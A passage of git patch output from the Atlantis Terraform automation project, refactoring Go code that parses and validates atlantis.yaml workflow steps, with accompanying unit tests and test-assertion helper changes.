Map map[string]map[string][]string + // StringVal will be set in case #3 above. + StringVal map[string]string +} + +func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + // We validate if it's a legal string later. + var singleString string + err := unmarshal(&singleString) + if err == nil { + s.Key = &singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + // We validate if there's a single key in the map and if the value is a + // legal value later. + var step map[string]map[string][]string + err = unmarshal(&step) + if err == nil { + s.Map = step + return nil + } + + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + // We validate if the key is run later. + var runStep map[string]string + err = unmarshal(&runStep) + if err == nil { + s.StringVal = runStep + return nil + } + + return err +} diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go deleted file mode 100644 index f6e7713c0f..0000000000 --- a/server/events/yaml/step_config.go +++ /dev/null @@ -1,82 +0,0 @@ -package yaml - -import ( - "fmt" - - "github.com/flynn-archive/go-shlex" - "github.com/pkg/errors" -) - -type StepConfig struct { - StepType string - ExtraArgs []string - // Run will be set if the StepType is "run". This is for custom commands. - // Ex. if the key is `run: echo hi` then Run will be "echo hi". - Run []string -} - -func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { - // First try to unmarshal as a single string, ex. - // steps: - // - init - // - plan - var singleString string - err := unmarshal(&singleString) - if err == nil { - if singleString != "init" && singleString != "plan" && singleString != "apply" { - return fmt.Errorf("unsupported step type: %q", singleString) - } - s.StepType = singleString - return nil - } - - // This represents a step with extra_args, ex: - // init: - // extra_args: [a, b] - var step map[string]map[string][]string - if err = unmarshal(&step); err == nil { - if len(step) != 1 { - return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") - } - - for k, v := range step { - if k != "init" && k != "plan" && k != "apply" { - return fmt.Errorf("unsupported step %q", k) - } - - extraArgs, ok := v["extra_args"] - if !ok { - return errors.New("the only supported key for a step is 'extra_args'") - } - - s.StepType = k - s.ExtraArgs = extraArgs - return nil - } - } - - // Try to unmarshal as a custom run step, ex. - // steps: - // - run: my command - var runStep map[string]string - if err = unmarshal(&runStep); err == nil { - if len(runStep) != 1 { - return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") - } - - for k, v := range runStep { - if k != "run" { - return fmt.Errorf("unsupported step %q", k) - } - - s.StepType = "run" - parts, err := shlex.Split(v) - if err != nil { - return err - } - s.Run = parts - } - } - - return err -} diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go deleted file mode 100644 index c75777ba53..0000000000 --- a/server/events/yaml/step_config_test.go +++ /dev/null @@ -1,159 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestStepConfig_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.StepConfig - expErr string - }{ - - //Single string. - { - description: "should parse just init", - input: `init`, - exp: yaml.StepConfig{ - StepType: "init", - }, - }, - { - description: "should parse just plan", - input: `plan`, - exp: yaml.StepConfig{ - StepType: "plan", - }, - }, - { - description: "should parse just apply", - input: `apply`, - exp: yaml.StepConfig{ - StepType: "apply", - }, - }, - - // With extra_args. - { - description: "should parse init with extra_args", - input: ` -init: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "init", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - { - description: "should parse plan with extra_args", - input: ` -plan: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "plan", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - { - description: "should parse apply with extra_args", - input: ` -apply: - extra_args: [arg1, arg2]`, - exp: yaml.StepConfig{ - StepType: "apply", - ExtraArgs: []string{"arg1", "arg2"}, - }, - }, - - // extra_args with non-strings. - { - description: "should convert non-string extra_args into strings", - input: ` -init: - extra_args: [1]`, - exp: yaml.StepConfig{ - StepType: "init", - ExtraArgs: []string{"1"}, - }, - }, - { - description: "should convert non-string extra_args into strings", - input: ` -plan: - extra_args: [true]`, - exp: yaml.StepConfig{ - StepType: "plan", - ExtraArgs: []string{"true"}, - }, - }, - - // Custom run step. - { - description: "should allow for custom run steps", - input: ` -run: echo my command`, - exp: yaml.StepConfig{ - StepType: "run", - Run: []string{"echo", "my", "command"}, - }, - }, - { - description: "should split words correctly in run step", - input: ` -run: echo 'my command'`, - exp: yaml.StepConfig{ - StepType: "run", - Run: []string{"echo", "my command"}, - }, - }, - - // Invalid steps - { - description: "should error when element is a map", - input: ` -key1: val -key2: val`, - expErr: "each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val", - }, - { - description: "should error when unrecognized step is used", - input: ` -invalid: val -`, - expErr: "unsupported step \"invalid\"", - }, - { - description: "should error when unrecognized step is used", - input: ` -invalid: - extra_args: [] -`, - expErr: "unsupported step \"invalid\"", - }, - { - description: "should error when unrecognized step is used", - input: ` -run: []`, - expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!seq into string", - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var got yaml.StepConfig - err := yamlv2.Unmarshal([]byte(c.input), &got) - if c.expErr != "" { - ErrEquals(t, c.expErr, err) - return - } - Ok(t, err) - Equals(t, c.exp, got) - }) - } -} diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go new file mode 100644 index 0000000000..4bdb6f33ec --- /dev/null +++ b/server/events/yaml/step_test.go @@ -0,0 +1,134 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Step + expErr string + }{ + + // Single string. + { + description: "single string", + input: `astring`, + exp: yaml.Step{ + Key: String("astring"), + }, + }, + + // map[string]map[string][]string i.e. extra_args style. + { + description: "extra_args style", + input: ` +key: + mapValue: [arg1, arg2]`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "mapValue": {"arg1", "arg2"}, + }, + }, + }, + }, + { + description: "extra_args style multiple keys", + input: ` +key: + mapValue: [arg1, arg2] + value2: []`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "mapValue": {"arg1", "arg2"}, + "value2": {}, + }, + }, + }, + }, + { + description: "extra_args style multiple top-level keys", + input: ` +key: + val1: [] +key2: + val2: []`, + exp: yaml.Step{ + Map: map[string]map[string][]string{ + "key": { + "val1": {}, + }, + "key2": { + "val2": {}, + }, + }, + }, + }, + + // Run-step style + { + description: "run step", + input: ` +run: my command`, + exp: yaml.Step{ + StringVal: map[string]string{ + "run": "my command", + }, + }, + }, + { + description: "run step multiple top-level keys", + input: ` +run: my command +key: value`, + exp: yaml.Step{ + StringVal: map[string]string{ + "run": "my command", + "key": "value", + }, + }, + }, + + // Empty + { + description: "empty", + input: "", + exp: yaml.Step{ + Key: nil, + Map: nil, + StringVal: nil, + }, + }, + + // Errors + { + description: "extra args style no slice strings", + input: ` +key: + value: + another: map`, + expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got yaml.Step + err := yamlv2.UnmarshalStrict([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go index 97055cb3da..0dd069c648 100644 --- a/server/events/yaml/workflow.go +++ b/server/events/yaml/workflow.go @@ -1,60 +1,6 @@ package yaml -import "errors" - type Workflow struct { - Apply *Stage `yaml:"apply"` // defaults to regular apply steps - Plan *Stage `yaml:"plan"` // defaults to regular plan steps -} - -func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { - // Check if they forgot to set the "steps" key and just started listing - // steps, ex. - // plan: - // - init - // - plan - type MissingSteps struct { - Apply []interface{} - Plan []interface{} - } - var missingSteps MissingSteps - // This will pass if they've just set the key to null, which we don't want - // since in that case we use the defaults to we also check if the len > 0. - if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) { - return errors.New("missing \"steps\" key") - } - - // Use a type alias so unmarshal doesn't get into an infinite loop. - type alias Workflow - var tmp alias - if err := unmarshal(&tmp); err != nil { - return err - } - *p = Workflow(tmp) - - // If plan or apply keys aren't specified we use the default workflow. - if p.Apply == nil { - p.Apply = &Stage{ - []StepConfig{ - { - StepType: "apply", - }, - }, - } - } - - if p.Plan == nil { - p.Plan = &Stage{ - []StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - } - } - - return nil + Apply *Stage `yaml:"apply,omitempty"` + Plan *Stage `yaml:"plan,omitempty"` } diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go index dd299799e4..c2dcbb34f8 100644 --- a/server/events/yaml/workflow_test.go +++ b/server/events/yaml/workflow_test.go @@ -16,102 +16,70 @@ func TestWorkflow_UnmarshalYAML(t *testing.T) { expErr string }{ { - description: "should use defaults if set to null", + description: "empty", + input: ``, + exp: yaml.Workflow{ + Apply: nil, + Plan: nil, + }, + }, + { + description: "yaml null", input: `~`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, - }, + Apply: nil, + Plan: nil, }, }, { - description: "should use set values", + description: "only plan/apply set", input: ` plan: - steps: - - plan apply: - steps: [] `, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, - Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "plan", - }, - }, - }, + Apply: nil, + Plan: nil, }, }, { - description: "should use defaults for apply if only plan set", + description: "steps set to null", input: ` plan: - steps: []`, + steps: ~ +apply: + steps: ~`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "apply", - }, - }, - }, Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{}, + Steps: nil, + }, + Apply: &yaml.Stage{ + Steps: nil, }, }, }, { - description: "should use defaults for plan if only apply set", + description: "steps set to empty slice", input: ` +plan: + steps: [] apply: steps: []`, exp: yaml.Workflow{ - Apply: &yaml.Stage{ - Steps: []yaml.StepConfig{}, - }, Plan: &yaml.Stage{ - Steps: []yaml.StepConfig{ - { - StepType: "init", - }, - { - StepType: "plan", - }, - }, + Steps: []yaml.Step{}, + }, + Apply: &yaml.Stage{ + Steps: []yaml.Step{}, }, }, }, - { - description: "should error if no steps key specified", - input: ` -apply: -- apply`, - expErr: "missing \"steps\" key", - }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { var w yaml.Workflow - err := yamlv2.Unmarshal([]byte(c.input), &w) + err := yamlv2.UnmarshalStrict([]byte(c.input), &w) if c.expErr != "" { ErrEquals(t, c.expErr, err) return diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/yaml_test.go new file mode 100644 index 0000000000..c82dd3486b --- /dev/null +++ b/server/events/yaml/yaml_test.go @@ -0,0 +1,13 @@ +package yaml_test + +// Bool is a helper routine that allocates a new bool value +// to store v and returns a pointer to it. +func Bool(v bool) *bool { return &v } + +// Int is a helper routine that allocates a new int value +// to store v and returns a pointer to it. +func Int(v int) *int { return &v } + +// String is a helper routine that allocates a new string value +// to store v and returns a pointer to it. +func String(v string) *string { return &v } diff --git a/testing/assertions.go b/testing/assertions.go index 5b6ad147bd..d66266824e 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -20,6 +20,7 @@ import ( "strings" "testing" + "github.com/davecgh/go-spew/spew" "github.com/go-test/deep" ) @@ -49,8 +50,7 @@ func Equals(tb testing.TB, exp, act interface{}) { tb.Helper() if diff := deep.Equal(exp, act); diff != nil { _, file, line, _ := runtime.Caller(1) - fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act) - tb.Fatal(diff) + tb.Fatalf("\033[31m%s:%d: %s\n\nexp: %s******\ngot: %s\033[39m\n", filepath.Base(file), line, diff, spew.Sdump(exp), spew.Sdump(act)) } } @@ -58,10 +58,10 @@ func Equals(tb testing.TB, exp, act interface{}) { func ErrEquals(tb testing.TB, exp string, act error) { tb.Helper() if act == nil { - tb.Fatalf("exp err %q but err was nil", exp) + tb.Fatalf("exp err %q but err was nil\n", exp) } if act.Error() != exp { - tb.Fatalf("exp err: %q but got: %q", exp, act.Error()) + tb.Fatalf("exp err: %q but got: %q\n", exp, act.Error()) } } From d70e57e87bb876f49b16ea45107e51891e52782f Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 13 Jun 2018 13:54:04 +0100 Subject: [PATCH 20/69] Yaml parsing and validation. --- server/events/execution_planner.go | 16 +- server/events/markdown_renderer.go | 2 +- server/events/yaml/auto_plan.go | 6 - server/events/yaml/auto_plan_test.go | 69 -- server/events/yaml/parser_validator.go | 61 +- server/events/yaml/parser_validator_test.go | 1049 +++++++++-------- server/events/yaml/project.go | 10 - server/events/yaml/project_test.go | 63 - server/events/yaml/raw/autoplan.go | 39 + server/events/yaml/raw/autoplan_test.go | 151 +++ server/events/yaml/raw/project.go | 70 ++ server/events/yaml/raw/project_test.go | 178 +++ server/events/yaml/raw/raw.go | 4 + .../yaml/{yaml_test.go => raw/raw_test.go} | 2 +- server/events/yaml/raw/spec.go | 45 + server/events/yaml/raw/spec_test.go | 268 +++++ server/events/yaml/raw/stage.go | 26 + server/events/yaml/raw/stage_test.go | 103 ++ server/events/yaml/raw/step.go | 195 +++ server/events/yaml/raw/step_test.go | 387 ++++++ server/events/yaml/raw/workflow.go | 31 + server/events/yaml/raw/workflow_test.go | 168 +++ server/events/yaml/spec.go | 7 - server/events/yaml/spec_test.go | 152 --- server/events/yaml/stage.go | 5 - server/events/yaml/stage_test.go | 47 - server/events/yaml/step.go | 61 - server/events/yaml/step_test.go | 134 --- server/events/yaml/valid/valid.go | 41 + server/events/yaml/workflow.go | 6 - server/events/yaml/workflow_test.go | 91 -- server/events/yaml/yaml.go | 4 - 32 files changed, 2306 insertions(+), 1185 deletions(-) delete mode 100644 server/events/yaml/auto_plan.go delete mode 100644 server/events/yaml/auto_plan_test.go delete mode 100644 server/events/yaml/project.go delete mode 100644 server/events/yaml/project_test.go create mode 100644 server/events/yaml/raw/autoplan.go create mode 100644 server/events/yaml/raw/autoplan_test.go create mode 100644 server/events/yaml/raw/project.go create mode 100644 server/events/yaml/raw/project_test.go create mode 100644 server/events/yaml/raw/raw.go rename server/events/yaml/{yaml_test.go => raw/raw_test.go} (95%) create mode 100644 server/events/yaml/raw/spec.go create mode 100644 server/events/yaml/raw/spec_test.go create mode 100644 server/events/yaml/raw/stage.go create mode 100644 server/events/yaml/raw/stage_test.go create mode 100644 server/events/yaml/raw/step.go create mode 100644 server/events/yaml/raw/step_test.go create mode 100644 server/events/yaml/raw/workflow.go create mode 100644 server/events/yaml/raw/workflow_test.go delete mode 100644 server/events/yaml/spec.go delete mode 100644 server/events/yaml/spec_test.go delete mode 100644 server/events/yaml/stage.go delete mode 100644 server/events/yaml/stage_test.go delete mode 100644 server/events/yaml/step.go delete mode 100644 server/events/yaml/step_test.go create mode 100644 server/events/yaml/valid/valid.go delete mode 100644 server/events/yaml/workflow.go delete mode 100644 server/events/yaml/workflow_test.go delete mode 100644 server/events/yaml/yaml.go diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index 415ed2da18..4b13ce2190 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -9,6 +9,7 @@ import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/events/yaml/valid" "github.com/runatlantis/atlantis/server/logging" ) @@ -75,7 +76,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu // Else we run plan according to the config file. var stages []runtime.PlanStage for _, p := range config.Projects { - if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { + if s.shouldAutoplan(p.Autoplan, modifiedFiles) { // todo stages = append(stages) } @@ -83,7 +84,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu return stages, nil } -func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { +func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool { return true } @@ -118,15 +119,16 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // Get this project's configuration. for _, p := range config.Projects { if p.Dir == relProjectPath && p.Workspace == workspace { - workflowName := p.Workflow + workflowNamePtr := p.Workflow // If they didn't specify a workflow, use the default. - if workflowName == "" { + if workflowNamePtr == nil { log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) return defaults, nil } // If they did specify a workflow, find it. + workflowName := *workflowNamePtr workflow, exists := config.Workflows[workflowName] if !exists { return nil, fmt.Errorf("no workflow with key %q defined", workflowName) @@ -135,7 +137,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []runtime.Step - var stepsConfig []yaml.Step + var stepsConfig []valid.Step if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { @@ -143,7 +145,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge } for _, stepConfig := range stepsConfig { var step runtime.Step - switch stepConfig.Key { + switch stepConfig.StepName { case "init": step = &runtime.InitStep{ Meta: meta, @@ -162,7 +164,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge case "run": step = &runtime.RunStep{ Meta: meta, - Commands: stepConfig.StringVal, + Commands: stepConfig.RunCommand, } } steps = append(steps, step) diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index f91a45a1f1..4094c3861c 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -125,7 +125,7 @@ var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse( "Ran {{.Command}} for {{ len .Results }} projects:\n" + "{{ range $result := .Results }}" + - "1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" + + "1. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + "{{end}}\n" + "{{ range $i, $result := .Results }}" + "### {{add $i 1}}. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" + diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go deleted file mode 100644 index 00eb0cc79d..0000000000 --- a/server/events/yaml/auto_plan.go +++ /dev/null @@ -1,6 +0,0 @@ -package yaml - -type AutoPlan struct { - WhenModified []string `yaml:"when_modified,omitempty"` - Enabled *bool `yaml:"enabled,omitempty"` -} diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go deleted file mode 100644 index 04d517d94f..0000000000 --- a/server/events/yaml/auto_plan_test.go +++ /dev/null @@ -1,69 +0,0 @@ -package yaml_test - -import ( - "testing" - - "github.com/runatlantis/atlantis/server/events/yaml" - . "github.com/runatlantis/atlantis/testing" - yamlv2 "gopkg.in/yaml.v2" -) - -func TestAutoPlan_UnmarshalYAML(t *testing.T) { - cases := []struct { - description string - input string - exp yaml.AutoPlan - }{ - { - description: "omit unset fields", - input: "", - exp: yaml.AutoPlan{ - Enabled: nil, - WhenModified: nil, - }, - }, - { - description: "all fields set", - input: ` -enabled: true -when_modified: ["something-else"] -`, - exp: yaml.AutoPlan{ - Enabled: Bool(true), - WhenModified: []string{"something-else"}, - }, - }, - { - description: "enabled false", - input: ` -enabled: false -when_modified: ["something-else"] -`, - exp: yaml.AutoPlan{ - Enabled: Bool(false), - WhenModified: []string{"something-else"}, - }, - }, - { - description: "modified elem empty", - input: ` -enabled: false -when_modified: -- -`, - exp: yaml.AutoPlan{ - Enabled: Bool(false), - WhenModified: []string{""}, - }, - }, - } - - for _, c := range cases { - t.Run(c.description, func(t *testing.T) { - var a yaml.AutoPlan - err := yamlv2.UnmarshalStrict([]byte(c.input), &a) - Ok(t, err) - Equals(t, c.exp, a) - }) - } -} diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index f824737404..8dc895d132 100644 --- a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -1,11 +1,15 @@ package yaml import ( + "fmt" "io/ioutil" "os" "path/filepath" + "github.com/go-ozzo/ozzo-validation" "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/yaml/raw" + "github.com/runatlantis/atlantis/server/events/yaml/valid" "gopkg.in/yaml.v2" ) @@ -17,50 +21,57 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). -func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) { +func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) // NOTE: the error we return here must also be os.IsNotExist since that's // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return Spec{}, err + return valid.Spec{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return valid.Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. config, err := r.parseAndValidate(configData) if err != nil { - return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) { - var repoConfig Spec - if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { - return repoConfig, err +func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { + var rawSpec raw.Spec + if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil { + return valid.Spec{}, err } - // Validate version. - //if repoConfig.Version != 2 { - // // todo: this will fail old atlantis.yaml files, we should deal with them in a better way. - // return repoConfig, errors.New("unknown version: must have \"version: 2\" set") - //} - // - //// Validate projects. - //if len(repoConfig.Projects) == 0 { - // return repoConfig, errors.New("'projects' key must exist and contain at least one element") - //} - // - //for i, project := range repoConfig.Projects { - // if project.Dir == "" { - // return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i) - // } - //} - return repoConfig, nil + // Set ErrorTag to yaml so it uses the YAML field names in error messages. + validation.ErrorTag = "yaml" + + if err := rawSpec.Validate(); err != nil { + return valid.Spec{}, err + } + + // Top level validation. + for _, p := range rawSpec.Projects { + if p.Workflow != nil { + workflow := *p.Workflow + found := false + for k := range rawSpec.Workflows { + if k == workflow { + found = true + } + } + if !found { + return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow) + } + } + } + + return rawSpec.ToValid(), nil } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 3081970892..51fa1ca702 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -1,498 +1,555 @@ package yaml_test -//func TestReadConfig_DirDoesNotExist(t *testing.T) { -// r := yaml.ParserValidator{} -// _, err := r.ReadConfig("/not/exist") -// Assert(t, os.IsNotExist(err), "exp nil ptr") -//} -// -//func TestReadConfig_FileDoesNotExist(t *testing.T) { -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// r := yaml.ParserValidator{} -// _, err := r.ReadConfig(tmpDir) -// Assert(t, os.IsNotExist(err), "exp nil ptr") -//} -// -//func TestReadConfig_BadPermissions(t *testing.T) { -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrContains(t, "unable to read atlantis.yaml file: ", err) -//} -// -//func TestReadConfig_UnmarshalErrors(t *testing.T) { -// // We only have a few cases here because we assume the YAML library to be -// // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810. -// cases := []struct { -// description string -// input string -// expErr string -// }{ -// { -// "random characters", -// "slkjds", -// "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Spec", -// }, -// { -// "just a colon", -// ":", -// "parsing atlantis.yaml: yaml: did not find expected key", -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrEquals(t, c.expErr, err) -// }) -// } -//} -// -//func TestReadConfig_Invalid(t *testing.T) { -// cases := []struct { -// description string -// input string -// expErr string -// }{ -// // Invalid version. -// { -// description: "no version", -// input: ` -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// { -// description: "unsupported version", -// input: ` -//version: 0 -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// { -// description: "empty version", -// input: ` -//version: ~ -//projects: -//- dir: "." -//`, -// expErr: "unknown version: must have \"version: 2\" set", -// }, -// -// // No projects specified. -// { -// description: "no projects key", -// input: `version: 2`, -// expErr: "'projects' key must exist and contain at least one element", -// }, -// { -// description: "empty projects list", -// input: ` -//version: 2 -//projects:`, -// expErr: "'projects' key must exist and contain at least one element", -// }, -// -// // Project must have dir set. -// { -// description: "project with no config", -// input: ` -//version: 2 -//projects: -//-`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project without dir set", -// input: ` -//version: 2 -//projects: -//- workspace: "staging"`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with dir set to empty string", -// input: ` -//version: 2 -//projects: -//- dir: ""`, -// expErr: "project at index 0 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with no config at index 1", -// input: ` -//version: 2 -//projects: -//- dir: "." -//-`, -// expErr: "project at index 1 invalid: dir key must be set and non-empty", -// }, -// { -// description: "project with unknown key", -// input: ` -//version: 2 -//projects: -//- unknown: value`, -// expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", -// }, -// } -// -// tmpDir, cleanup := TempDir(t) -// defer cleanup() -// -// for _, c := range cases { -// t.Run(c.description, func(t *testing.T) { -// err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) -// Ok(t, err) -// -// r := yaml.ParserValidator{} -// _, err = r.ReadConfig(tmpDir) -// ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) -// }) -// } -//} -// -//func TestReadConfig_Successes(t *testing.T) { -// basicProjects := []yaml.Project{ -// { -// AutoPlan: &yaml.AutoPlan{ -// Enabled: true, -// WhenModified: []string{"**/*.tf"}, -// }, -// Workspace: "default", -// TerraformVersion: "", -// ApplyRequirements: nil, -// Workflow: "", -// Dir: ".", -// }, -// } -// -// cases := []struct { -// description string -// input string -// expOutput yaml.Spec -// }{ -// { -// description: "uses project defaults", -// input: ` -//version: 2 -//projects: -//- dir: "."`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "autoplan is enabled by default", -// input: ` -//version: 2 -//projects: -//- dir: "." -// auto_plan: -// when_modified: ["**/*.tf"] -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if workflows not defined, there are none", -// input: ` -//version: 2 -//projects: -//- dir: "." -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if workflows key set but with no workflows there are none", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: ~ -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// }, -// }, -// { -// description: "if a workflow is defined but set to null we use the defaults", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: ~ -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "apply", -// }, -// }, -// }, -// }, -// }, -// }, -// }, -// { -// description: "if a plan or apply has no steps defined then we use the defaults", -// input: ` -//version: 2 -//projects: -//- dir: "." -//workflows: -// default: -// plan: -// apply: -//`, -// expOutput: yaml.Spec{ -// Version: 2, -// Projects: basicProjects, -// Workflows: map[string]yaml.Workflow{ -// "default": { -// Plan: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// StepType: "init", -// }, -// { -// StepType: "plan", -// }, -// }, -// }, -// Apply: &yaml.Stage{ -// Steps: []yaml.Step{ -// { -// 